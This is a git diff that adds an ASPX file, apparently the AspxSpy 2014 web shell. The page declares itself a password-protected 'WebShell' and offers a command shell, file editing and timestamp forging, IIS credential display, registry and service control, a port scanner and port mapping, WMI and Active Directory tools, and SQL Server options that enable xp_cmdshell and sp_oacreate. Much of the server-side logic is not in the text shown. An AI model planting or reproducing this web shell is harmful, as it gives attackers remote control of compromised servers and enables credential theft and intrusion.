diff --git a/aspx/AspxSpy2014Final.aspx b/aspx/AspxSpy2014Final.aspx new file mode 100644 index 0000000..d0cf8a4 --- /dev/null +++ b/aspx/AspxSpy2014Final.aspx @@ -0,0 +1,2964 @@ +<%@ Page Language="C#" Debug="false" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%> +<%@ import Namespace="System.IO"%> +<%@ import Namespace="System.IO.Compression"%> +<%@ import Namespace="System.Diagnostics"%> +<%@ import Namespace="System.Data"%> +<%@ import Namespace="System.Data.OleDb"%> +<%@ import Namespace="System.Data.Common"%> +<%@ Import Namespace="System.Data.SqlClient"%> +<%@ import Namespace="System.Management"%> +<%@ import Namespace="Microsoft.Win32"%> +<%@ import Namespace="System.Net" %> +<%@ import Namespace="System.Net.Sockets" %> +<%@ import Namespace="System.Reflection"%> +<%@ import Namespace="System.Runtime.InteropServices"%> +<%@ import Namespace="System.DirectoryServices"%> +<%@ import Namespace="System.ServiceProcess"%> +<%@ import Namespace="System.Text.RegularExpressions"%> +<%@ Import Namespace="System.Security"%> +<%@ Import Namespace="System.Security.Permissions"%> +<%@ Import Namespace="System.Threading"%> +<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%> +<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%> +<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%> + + + + + +<%=Version + " - " +Request.ServerVariables["SERVER_NAME"]%> + + + + +
+
+ Password: + + +
+
+
+ + + + + + + +
WebShell Ver: <%=Version%>
+ | | | | | | | | | | | | | | |
+
+
+
+

+ <%--FileList--%> +
+ + + + + + +
Current Directory : +
+ + + +  FilenameLast modifiedSizeAction + +
+
+
| Create Directory | Create File + | Kill Me +
+
+ <%--FileEdit--%> +
+

Current File(import new file name and new file)
+ DefaultUTF-8 +

+

File Content
+ +

+

+
+ <%--CloneTime--%> +
+

Alter file

+

Reference file(fullpath)

+

+

Set last modified »

+

Current file(fullpath)

+

+ +   + +   + +   + +

+

+ CreationTime : + + LastWriteTime : + + LastAccessTime : + +

+

+ +

+
+ <%--IISSpy--%> +
+ + + IDIIS_USERIIS_PASSDomainPath + +
+
+ <%--Process--%> +
+ + + IDProcessThreadCountPriorityAction + +
+
+ <%--CmdShell--%> +
+

CmdPath:
+ +

+ Argument:
+ +
+
+
+ <%--Services--%> +
+ + + IDNamePathStateStartMode + +
+
+ <%--Sysinfo--%> +
+
+
    +

    +
    +
      +

      +
      +
        +
        + <%--UserInfo--%> +
        + + + +
        +
        + <%--Reg--%> +
        +

        Registry Path :

        + + + + KeyValue + +
        +
        + <%--PortScan--%> +
        +

        + IP : Port : +

        +
        +
        + <%--DataBase--%> +
        +
        +

        ConnString : MSSQLOleDb

        +
        +
        +
        + Please select a database : + SQLExec : -- SQL Server Exec --Add xp_cmdshellAdd sp_oacreateAdd xp_cmdshell(SQL2005)Add sp_oacreate(SQL2005)Add makewebtask(SQL2005)Add openrowset/opendatasource(SQL2005)XP_cmdshell execXP_dirtreeSP_oamethod execSP_makewebtask make fileSandBoxLogBackupDatabaseBackupSA_UpfileFileCopy + +
        +
        Run SQL
        + +
        + +
        + + + + + + +
        UpFile : SavePath :      +
        +
        + + + + + +
        Source : Target :         
        +
        +
        +

        + +

        +
        +
        +
        + <%--PortMap--%> +
        + + + + + + + +
        Local Ip : Local Port : Remote Ip : Remote Port :

        + + IDRemoteLocalStatusAction + +
        + <%--Search--%> + + <%--WmiTools--%> +
        +
        +

        Computer:Username:Password:Namespace:QueryString :  

        +
        + Result:
        + +
        +
        + <%--ADS Viewer--%> +
        + + + + + + + + + + + + + + +
        Current Path: + Filter: + UserName: + PassWord: + Type:
        + + +
        + + + + NameTypeSchemaValuePath + +
        +
        Schema:
        + | + | + | + | + | + | + | + | + +
        +
        + <%--Plugin Loader--%> +
        + Select a File:



        TypeName:


        MethodName:


        Params:


        +
        +
        +
        +
        Copyright(C)2006-2014 Bin'Blog All Rights Reserved.
        + +
        + +